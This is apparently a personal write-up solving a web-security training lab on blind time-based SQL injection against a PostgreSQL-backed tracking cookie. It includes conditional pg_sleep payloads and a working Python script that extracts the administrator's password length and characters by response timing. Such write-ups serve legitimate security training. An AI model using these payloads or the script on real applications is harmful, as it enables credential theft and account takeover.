15 - Blind SQL injection with time delays and information retrieval

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Given : Injection point(TrackingId), Attack type(Blind time-based), Table(users), Columns(username,password)
End goal : Cause a delay of 10 second in response

By previous lab we know the injection point. But now this time we have to create delay on a certein condition. We can use the following query to create a delay on a condition - '||CASE WHEN (1-1) THEN pg_sleep(10) ELSE pg_sleep(0) END||'

Now I have to calculate the length of the password of the administrator user. Following query can be used in burp intruder to get the length of the password - ' || CASE WHEN (LENGTH((SELECT password from users where username='administrator'))= 20) THEN pg_sleep (10) ELSE pg_sleep (0) END||'

(On 20 look at the response timings)

Now we have to brute force the password. If we start brute forcing the password manually of using intruder , it takes much time. So I created a simple python script to brute force the characters of the passwords.

(make sure to change the Url , cookie values before running)

Code  python
import requests

url = "https://0af1007403336c3a8246c913005c007e.web-security-academy.net"

char="abcdefghijklmnopqrstuvwxyz1234567890"
def get_length():
    for i in range(1,100):
        cookie = {'TrackingId':'XY4mxaMGTV84T2Gr','session':'VM38uDsbXrEI8aNMF3sU5AhNXBVGYIRf'}
        payload = f"'||CASE WHEN (LENGTH((SELECT password from users where username='administrator'))={i}) THEN pg_sleep(10) ELSE pg_sleep(0) END||'"
        cookie['TrackingId']+=payload
        res = requests.get(url,cookies=cookie)
        if res.elapsed.total_seconds() > 2:
            return i
length = get_length()
print("[+] Length of password : ",length)
def get_pass(lengt):
    passwd = ""
    for i in range(1,lengt+1):
        for c in char:
            cookie = {'TrackingId':'P8IUnUqqZqBKVVri','session':'VM38uDsbXrEI8aNMF3sU5AhNXBVGYIRf'}
            payload=f"'||CASE WHEN (substr((SELECT password from users where username='administrator'),{i},1)='{c}') THEN pg_sleep(10) ELSE pg_sleep(0) END ||'"
            cookie['TrackingId']+=payload
            res=requests.get(url,cookies=cookie)
            if res.elapsed.total_seconds() > 2:
               passwd+=c
               break
    return passwd
print("[+] Password is : ",get_pass(length))

Output -

Go to my account and login with administrator credentials.

Lab solved :

Prev Next

CAPA: The Basics01/02/25 ctf → thm → capa-the-basics

SQLMap: The Basics31/01/25 ctf → thm → sqlmap-the-basics

SQL Fundamentals31/01/25 ctf → thm → sql-fundamentals

Powershell30/01/25 programming → powershell